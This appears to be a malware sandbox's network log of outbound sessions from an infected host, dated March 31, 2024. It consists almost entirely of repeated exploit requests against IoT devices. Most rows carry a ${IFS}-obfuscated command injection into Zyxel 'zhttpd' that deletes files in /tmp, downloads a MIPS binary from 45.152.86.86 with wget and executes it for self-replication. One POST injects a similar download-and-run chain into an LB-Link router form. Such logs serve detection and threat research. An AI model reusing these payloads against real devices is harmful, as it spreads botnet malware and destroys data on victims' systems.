                                        Mar 31, 2024 09:21:51.260660887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6074192.168.2.2354514124.150.106.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.260700941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6075192.168.2.235306898.162.242.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.261035919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6076192.168.2.2342938103.114.97.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:51.261085987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6077192.168.2.234796838.111.119.2268080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:52.221988916 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6078192.168.2.2349860194.118.166.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:52.269747019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6079192.168.2.2348572172.118.134.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:52.269812107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6080192.168.2.2347040133.236.76.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:52.269851923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6081192.168.2.2348394115.61.150.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:52.269905090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6082192.168.2.2347072175.216.89.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:52.269943953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6083192.168.2.2344748137.93.93.224443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:52.270180941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6084192.168.2.235340046.211.60.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:52.270243883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6085192.168.2.2353078147.115.11.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.279582024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6086192.168.2.234393291.34.101.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.279618979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6087192.168.2.234494043.137.210.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.279664993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6088192.168.2.2341954204.84.35.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.279690981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6089192.168.2.2342536112.182.238.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.279732943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6090192.168.2.235322686.140.175.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.279771090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6091192.168.2.2342530136.75.222.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.279824018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6092192.168.2.2334478125.147.195.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.279875040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6093192.168.2.23509601.138.9.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.280163050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6094192.168.2.234417896.53.247.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.280196905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6095192.168.2.2349996218.139.156.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:53.280240059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6096192.168.2.2334658210.198.237.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292002916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6097192.168.2.2339504130.13.63.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292046070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6098192.168.2.235567478.170.81.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292082071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6099192.168.2.2347970129.241.220.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292119026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6100192.168.2.2350526113.202.133.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292166948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6101192.168.2.2338026192.230.68.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292222023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6102192.168.2.2345242202.145.168.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292253017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6103192.168.2.2360290200.206.28.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292303085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6104192.168.2.234151238.65.255.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292345047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6105192.168.2.2360572172.89.170.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292392969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6106192.168.2.2352558152.165.54.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292428017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6107192.168.2.2359250172.45.193.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292480946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6108192.168.2.2340648189.217.146.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292520046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6109192.168.2.2358618140.249.235.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292548895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6110192.168.2.235387820.127.11.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292587996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6111192.168.2.2336638149.128.83.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292604923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6112192.168.2.2360442101.232.55.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292659044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6113192.168.2.234151438.8.48.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292685032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6114192.168.2.2348472118.143.24.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292716026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6115192.168.2.234316093.211.57.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292774916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6116192.168.2.2342400168.103.252.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292809010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6117192.168.2.2341122137.194.192.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292845011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6118192.168.2.234936298.114.121.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292891979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6119192.168.2.2357834118.23.233.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292927980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6120192.168.2.234283860.217.139.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.292975903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6121192.168.2.2358816163.138.228.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293008089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6122192.168.2.2353080137.14.162.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293051958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6123192.168.2.233634839.54.40.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293083906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6124192.168.2.233857887.24.191.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293112993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6125192.168.2.234927227.117.171.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293163061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6126192.168.2.2346410115.75.255.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293199062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6127192.168.2.2359034132.81.168.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293237925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6128192.168.2.2339500185.102.137.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293278933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6129192.168.2.2349420211.46.154.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293338060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6130192.168.2.2335232217.232.224.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293351889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6131192.168.2.2354890178.212.176.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293391943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6132192.168.2.233453666.7.21.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293431044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6133192.168.2.2340802122.80.173.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293479919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6134192.168.2.2349752179.236.155.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293510914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6135192.168.2.2352356107.230.30.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293545008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6136192.168.2.233441045.1.250.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293587923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6137192.168.2.235110842.15.14.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293631077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6138192.168.2.2355516191.152.5.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293656111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6139192.168.2.2358872195.8.147.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:54.293697119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6140192.168.2.2360852135.71.55.63443
                                        TimestampBytes transferredDirectionData
